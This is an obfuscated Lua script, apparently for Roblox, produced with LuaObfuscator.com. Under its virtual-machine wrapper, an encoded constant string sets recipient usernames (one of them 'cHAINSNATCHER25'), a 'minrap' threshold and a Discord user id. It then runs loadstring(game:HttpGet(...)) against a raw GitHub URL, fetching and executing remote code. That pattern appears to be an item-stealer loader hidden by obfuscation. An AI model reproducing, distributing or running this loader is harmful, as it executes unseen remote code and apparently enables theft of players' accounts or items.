--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v90=0;local v91;while true do if (v90==0) then v91=v2(v0(v30,16));if v19 then local v121=v5(v91,v19);v19=nil;return v121;else return v91;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v92=0;local v93;while true do if (v92==(0 -0)) then v93=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v93-(v93%(928 -(214 + 713))) ;end end else local v94=((1638 -(1523 + 114)) + 1)^(v32-(1 + 0)) ;return (((v31%(v94 + v94))>=v94) and 1) or (877 -(282 + 535 + 60)) ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=1 + 0 + 0 ;end end end local function v22() local v36=350 -(87 + 263) ;local v37;local v38;while true do if (v36==(181 -(67 + 113))) then return (v38 * (1213 -(892 + (258 -193)))) + v37 ;end if (v36==(0 -(952 -(802 + 150)))) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;v36=1 -0 ;end end end local function v23() local v39=0;local v40;local v41;local v42;local v43;while true do if (v39==(0 -(0 -0))) then v40,v41,v42,v43=v1(v16,v18,v18 + ((1192 -(1069 + 118)) -2) );v18=v18 + 3 + 1 ;v39=998 -(915 + 82) ;end if (v39==(2 -1)) then return (v43 * 16777216) + (v42 * 65536) + (v41 * (150 + (239 -133))) + v40 ;end end end local function v24() local v44=v23();local v45=v23();local v46=(1139 -(116 + 1022)) -(0 -0) ;local v47=(v20(v45,1 + 0 ,35 -15 ) * ((2 + 0)^32)) + v44 ;local v48=v20(v45,812 -(368 + 249 + 174) ,31);local v49=((v20(v45,100 -68 )==(19 -(10 + 8))) and  -(3 -(7 -5))) or (443 -(416 + 26)) ;if (v48==0) then if (v47==((0 -0) -0)) then return v49 * (0 + 0) ;else v48=1 -0 ;v46=438 -(145 + 293) ;end elseif (v48==2047) then return ((v47==(430 -(44 + 386))) and (v49 * ((1487 -((1857 -(814 + 45)) + 488))/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(838 + 185) ) * (v46 + (v47/(2^(824 -(201 + 571))))) ;end local function v25(v50) local v51;if  not v50 then local v95=(0 -0) -0 ;while true do if ((0 + 0)==v95) then v50=v23();if (v50==(0 + 0)) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(886 -(261 + (1704 -(1020 + 60)))) );v18=v18 + v50 ;local v52={};for v68=1, #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v96,v97,v98,v99,v100,v101,v102,v103,v104) local v105=(function() return 0 -0 ;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do local v113=(function() return 0 -0 ;end)();while true do if (v113==(0 -0)) then if (v105~=(286 -(134 + 151))) then else local v123=(function() return 0;end)();while true do if (v123==0) then local v168=(function() return 1665 -(970 + 695) ;end)();while true do if ((0 -0)~=v168) then else while true do if (v96==0) then v97=(function() return v98();end)();if (v99(v97, #"~", #"[")==(1990 -(582 + 1408))) then local v182=(function() return 0 -0 ;end)();local v183=(function() return;end)();local v184=(function() return;end)();local v185=(function() return;end)();local v186=(function() return;end)();while true do if (1==v182) then local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (v187==(0 -0)) then v188=(function() return 0;end)();while true do if (v188==1) then v182=(function() return 2;end)();break;end if (v188==(0 -0)) then v185=(function() return nil;end)();v186=(function() return nil;end)();v188=(function() return 1825 -(1195 + 629) ;end)();end end break;end end end if (v182==(0 -0)) then local v189=(function() return 0;end)();while true do if (v189==0) then v183=(function() return 0;end)();v184=(function() return nil;end)();v189=(function() return 242 -(187 + 54) ;end)();end if (v189~=(781 -(162 + 618))) then else v182=(function() return 1 + 0 ;end)();break;end end end if (2==v182) then while true do if (v183==0) then local v190=(function() return 0 + 0 ;end)();while true do if (v190==0) then v184=(function() return v99(v97,3 -1 , #"xxx");end)();v185=(function() return v99(v97, #"asd1",9 -3 );end)();v190=(function() return 1 + 0 ;end)();end if (v190==1) then v183=(function() return  #"{";end)();break;end end end if (v183~=2) then else local v191=(function() return 0;end)();local v192=(function() return;end)();while true do if (v191~=(1636 -(1373 + 263))) then else v192=(function() return 0;end)();while true do if (v192==(1001 -(451 + 549))) then v183=(function() return  #"xxx";end)();break;end if (v192==(0 + 0)) then if (v99(v185, #"<", #">")~= #"}") then else v186[2]=(function() return v100[v186[2]];end)();end if (v99(v185,2,2 -0 )== #"}") then v186[ #"19("]=(function() return v100[v186[ #"-19"]];end)();end v192=(function() return 1 -0 ;end)();end end break;end end end if (v183== #"\\") then local v193=(function() return 0;end)();while true do if (v193==1) then v183=(function() return 1386 -(746 + 638) ;end)();break;end if (v193==(0 + 0)) then v186=(function() return {v101(),v101(),nil,nil};end)();if (v184==(0 -0)) then local v196=(function() return 0;end)();local v197=(function() return;end)();while true do if (v196==(341 -(218 + 123))) then v197=(function() return 0;end)();while true do if (v197==(1581 -(1535 + 46))) then v186[ #"xnx"]=(function() return v101();end)();v186[ #"http"]=(function() return v101();end)();break;end end break;end end elseif (v184== #"}") then v186[ #"xxx"]=(function() return v102();end)();elseif (v184==(2 + 0)) then v186[ #"gha"]=(function() return v102() -((1 + 1)^(576 -(306 + 254))) ;end)();elseif (v184== #"-19") then local v204=(function() return 0 + 0 ;end)();local v205=(function() return;end)();while true do if (v204==(0 -0)) then v205=(function() return 0;end)();while true do if (v205==(1467 -(899 + 568))) then v186[ #"-19"]=(function() return v102() -((2 + 0)^16) ;end)();v186[ #".com"]=(function() return v101();end)();break;end end break;end end end v193=(function() return 2 -1 ;end)();end end end if (v183== #"xxx") then if (v99(v185, #"-19", #"xxx")== #"\\") then v186[ #"0313"]=(function() return v100[v186[ #"asd1"]];end)();end v103[v104]=(function() return v186;end)();break;end end break;end end end break;end end return v96,v97,v98,v99,v100,v101,v102,v103,v104;end end end end end if (0==v105) then v96=(function() return 603 -(268 + 335) ;end)();v97=(function() return nil;end)();v105=(function() return 1;end)();end break;end end end end;end)();local v54=(function() return function(v106,v107,v108) local v109=(function() return 0;end)();while true do if (v109~=(290 -(60 + 230))) then else local v120=(function() return 572 -(426 + 146) ;end)();while true do if (v120~=0) then else v106[v107-#"<" ]=(function() return v108();end)();return v106,v107,v108;end end end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"/",v59 do local v71=(function() return 0 + 0 ;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v71~=(1456 -(282 + 1174))) then else local v114=(function() return 811 -(569 + 242) ;end)();while true do if (v114~=1) then else v71=(function() return 1;end)();break;end if ((0 -0)~=v114) then else local v122=(function() return 0;end)();while true do if ((1 + 0)~=v122) then else v114=(function() return 1025 -(706 + 318) ;end)();break;end if (v122==0) then v72=(function() return v21();end)();v73=(function() return nil;end)();v122=(function() return 1252 -(721 + 530) ;end)();end end end end end if (v71==(1272 -(945 + 326))) then if (v72== #"[") then v73=(function() return v21()~=(0 -0) ;end)();elseif (v72==(2 + 0)) then v73=(function() return v24();end)();elseif (v72== #"xnx") then v73=(function() return v25();end)();end v60[v70]=(function() return v73;end)();break;end end end v58[ #"-19"]=(function() return v21();end)();for v74= #" ",v23() do FlatIdent_946F,Descriptor,v21,v20,v60,v22,v23,v55,v74=(function() return v53(FlatIdent_946F,Descriptor,v21,v20,v60,v22,v23,v55,v74);end)();end for v75= #"!",v23() do v56,v75,v28=(function() return v54(v56,v75,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[701 -(96 + 175 + (1758 -(797 + 532))) ];local v66=v62[2 + 0 ];local v67=v62[1503 -(1408 + 92) ];return function(...) local v76=v65;local v77=v66;local v78=v67;local v79=v27;local v80=1087 -(461 + 455 + 170) ;local v81= -(1289 -(993 + 295));local v82={};local v83={...};local v84=v12("#",...) -(1172 -(418 + 753)) ;local v85={};local v86={};for v110=0 + 0 ,v84 do if (v110>=v78) then v82[v110-v78 ]=v83[v110 + 1 + 0 ];else v86[v110]=v83[v110 + 1 + 0 + 0 ];end end local v87=(v84-v78) + 1 + 0 ;local v88;local v89;while true do v88=v76[v80];v89=v88[530 -(406 + 123) ];if ((4962>1721) and (v89<=4)) then if (v89<=(1770 -(1749 + (47 -27)))) then if (v89==(0 + 0)) then v86[v88[1324 -(1249 + (1275 -(373 + 829))) ]]=v64[v88[2 + 1 ]];else local v127=1145 -(466 + 679) ;local v128;local v129;local v130;local v131;while true do if (v127==0) then v128=nil;v129,v130=nil;v131=nil;v127=1;end if (v127==3) then v128=0 -(731 -(476 + 255)) ;for v178=v131,v81 do local v179=0 -0 ;while true do if (((802<=4833) and (v179==(1900 -(106 + 1794)))) or (1818==85)) then v128=v128 + 1 + 0 ;v86[v178]=v129[v128];break;end end end v80=v80 + 1 + 0 ;v127=(1141 -(369 + 761)) -(5 + 2) ;end if (v127==(5 -3)) then v131=v88[116 -(4 + 110) ];v129,v130=v79(v86[v131](v13(v86,v131 + (585 -(57 + 527)) ,v88[1430 -(41 + 1386) ])));v81=(v130 + v131) -(104 -(17 + 86)) ;v127=3 + 0 ;end if (v127==((14 -6) -(7 -3))) then v88=v76[v80];v131=v88[5 -(241 -(64 + 174)) ];v86[v131]=v86[v131](v13(v86,v131 + (167 -(18 + 104 + 44)) ,v81));v127=8 -3 ;end if (v127==(3 -2)) then v86[v88[2 + (0 -0) ]]=v88[1 + (338 -(144 + 192)) ];v80=v80 + (1 -0) ;v88=v76[v80];v127=2;end if ((2087==2087) and (v127==(70 -(30 + 35)))) then v80=v80 + 1 + 0 ;v88=v76[v80];v86[v88[218 -(42 + 174) ]]();v127=6;end if (v127==6) then v80=v80 + 1 ;v88=v76[v80];do return;end break;end end end elseif (v89<=(1259 -(1043 + 214))) then v86[v88[2]]=v88[(9 + 2) -8 ];elseif ((v89>(1215 -(323 + 889))) or (4445<4149)) then local v146=v88[5 -3 ];v86[v146]=v86[v146](v13(v86,v146 + (581 -(300 + 61 + 219)) ,v81));else v86[v88[322 -(53 + 267) ]]=v64[v88[1 + 2 ]];v80=v80 + (414 -(7 + 8 + (1902 -(363 + 1141)))) ;v88=v76[v80];v86[v88[2]][v88[985 -(18 + 964) ]]=v88[4];v80=v80 + (3 -2) ;v88=v76[v80];v86[v88[2 + 0 ]]=v64[v88[(1582 -(1183 + 397)) + 1 ]];v80=v80 + ((2590 -1739) -(20 + 830)) ;v88=v76[v80];v86[v88[2 + 0 ]][v88[129 -(116 + 10) ]]=v88[1 + 3 ];v80=v80 + (739 -(542 + 196)) ;v88=v76[v80];v86[v88[3 -1 ]]=v64[v88[1 + 2 ]];v80=v80 + 1 + 0 ;v88=v76[v80];v86[v88[1 + 1 ]][v88[(6 + 1) -4 ]]=v88[9 -(4 + 1) ];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v64[v88[1554 -(1126 + 425) ]];v80=v80 + (406 -(118 + 287)) ;v88=v76[v80];v86[v88[7 -5 ]][v88[1124 -(118 + 1003) ]]=v88[4];v80=v80 + 1 ;v88=v76[v80];v86[v88[5 -3 ]]=v64[v88[3]];v80=v80 + (378 -(142 + 235)) ;v88=v76[v80];v86[v88[9 -7 ]]=v64[v88[1 + 2 ]];end elseif (v89<=(983 -(553 + 424))) then if (v89==(9 -4)) then local v134=v88[2 + 0 ];local v135=v86[v88[3 + 0 ]];v86[v134 + 1 + 0 ]=v135;v86[v134]=v135[v88[2 + 2 ]];else local v139=v88[2];local v140,v141=v79(v86[v139](v13(v86,v139 + 1 + 0 ,v88[3])));v81=(v141 + v139) -1 ;local v142=0 -0 ;for v143=v139,v81 do v142=v142 + 1 ;v86[v143]=v140[v142];end end elseif ((630<2127) and (v89<=7)) then do return;end elseif ((v89==(22 -14)) or (1938==2514)) then v86[v88[(1979 -(1913 + 62)) -2 ]]();else v86[v88[1 + 1 ]][v88[14 -11 ]]=v88[757 -(239 + 514) ];end v80=v80 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0D3Q0003023Q005F4703083Q00557365726E616D65030B3Q00657363617061706461313403093Q00557365726E616D6532030F3Q00634841494E534E415443484552323503063Q006D696E726170025Q006AF84003083Q00646973637573657203123Q00393438333Q32332Q392Q34373430393334030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403483Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F626F2Q7461682Q332F5468756E6465722D7A2F726566732F68656164732F6D61696E2F48554200103Q0012033Q00013Q00304Q0002000300124Q00013Q00304Q0004000500124Q00013Q00304Q0006000700124Q00013Q00304Q0008000900124Q000A3Q00122Q0001000B3Q00200500010001000C0012010003000D6Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
